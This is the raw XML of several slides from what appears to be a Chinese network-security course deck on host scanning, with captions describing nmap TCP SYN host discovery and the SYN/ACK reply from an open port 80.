            <a:off x="5654675" y="1875155"/>
            <a:ext cx="5276850" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654675" y="5456555"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-10 发送SYN数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643245" y="932498"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.因为目标主机的80端口是开放的，所以有返回的SYN、ACK 数据包，如图2-2-11所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643245" y="1577658"/>
            <a:ext cx="5276850" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643245" y="5168583"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-11 返回的SYN、ACK数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="932498"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
